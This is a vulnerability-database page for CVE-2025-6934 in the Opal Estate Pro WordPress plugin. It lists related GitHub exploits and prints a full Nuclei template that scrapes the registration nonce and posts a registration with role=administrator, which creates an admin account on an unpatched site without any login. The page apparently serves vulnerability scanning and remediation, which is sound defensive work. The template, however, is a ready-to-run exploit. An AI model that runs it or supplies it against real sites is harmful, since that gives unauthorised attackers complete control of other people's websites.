Lucene search
K

The Opal Estate Pro – Property Management <= 1.7.5 - Unauthenticated Privilege Escalation

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Opal Estate Pro up to 1.7.5 lets unauthenticated users create administrator accounts.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Mephisto
21 May 202605:06
githubexploit
GithubExploit
Exploit for CVE-2025-6934
1 Jul 202513:05
githubexploit
GithubExploit
Exploit for CVE-2025-6934
5 Oct 202502:41
githubexploit
GithubExploit
Exploit for CVE-2025-6934
19 Jan 202613:59
githubexploit
GithubExploit
Exploit for CVE-2025-6934
16 Aug 202512:12
githubexploit
GithubExploit
Exploit for CVE-2025-6934
2 Jul 202514:23
githubexploit
GithubExploit
Exploit for CVE-2025-6934
30 Jan 202611:17
githubexploit
GithubExploit
Exploit for CVE-2025-6934
27 Aug 202512:24
githubexploit
GithubExploit
Exploit for CVE-2025-6934
13 Mar 202617:00
githubexploit
GithubExploit
Exploit for CVE-2025-6934
2 Sep 202507:49
githubexploit
Rows per page
id: CVE-2025-6934

info:
  name: The Opal Estate Pro – Property Management <= 1.7.5 - Unauthenticated Privilege Escalation
  author: pussycat0x
  severity: critical
  description: |
    The Opal Estate Pro plugin (≤ 1.7.5) is vulnerable to privilege escalation. Due to missing role restrictions in the on_register_user function, users can register with any role. This allows unauthenticated attackers to create administrator accounts.
  impact: |
    An attacker can exploit this vulnerability to register with administrator privileges, gaining complete control over the WordPress site.
  remediation: |
    Update the Opal Estate Pro plugin to a version newer than 1.7.5 when available, or remove the plugin if not essential.
  reference:
    - https://github.com/Nxploited/CVE-2025-6934/blob/main/README.md
    - https://wordpress.org/plugins/opal-estate-pro/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6934
    epss-score: 0.22334
    epss-percentile: 0.97396
    cwe-id: CWE-269
  metadata:
    verified: true
    max-request: 2
    vendor: themeforest
    product: opal-estate-pro
    publicwww-query: "/wp-content/plugins/opal-estate-pro/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,opalestate,vuln

flow: http(1) && http(2)

variables:
  username: "{{randstr}}"
  password: "{{to_lower(rand_text_alpha(8))}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "opalestate-register-nonce"
        internal: true

    extractors:
      - type: regex
        group: 1
        name: nonce
        part: body
        internal: true
        regex:
          - 'name="opalestate-register-nonce" value="([a-f0-9]+)"'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&email={{email}}&password={{password}}&password1={{password}}&role=administrator&confirmed_register=on&opalestate-register-nonce={{nonce}}&_wp_http_referer=%2F&ajax=1&action=opalestate_register_form

    matchers:
      - type: dsl
        dsl:
          - contains(body, 'status\":true')
          - status_code == 200
        condition: and
# digest: 4a0a004730450220422e1c6034f89db2d4f39ca968d4e208a6a7c75fc9d19f0efc2597f5b128ccd7022100b8a843ea0d9613c7364b957e2d098f072a6613acf8d2b1830ee4acecdb751688:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.22334
SSVC
15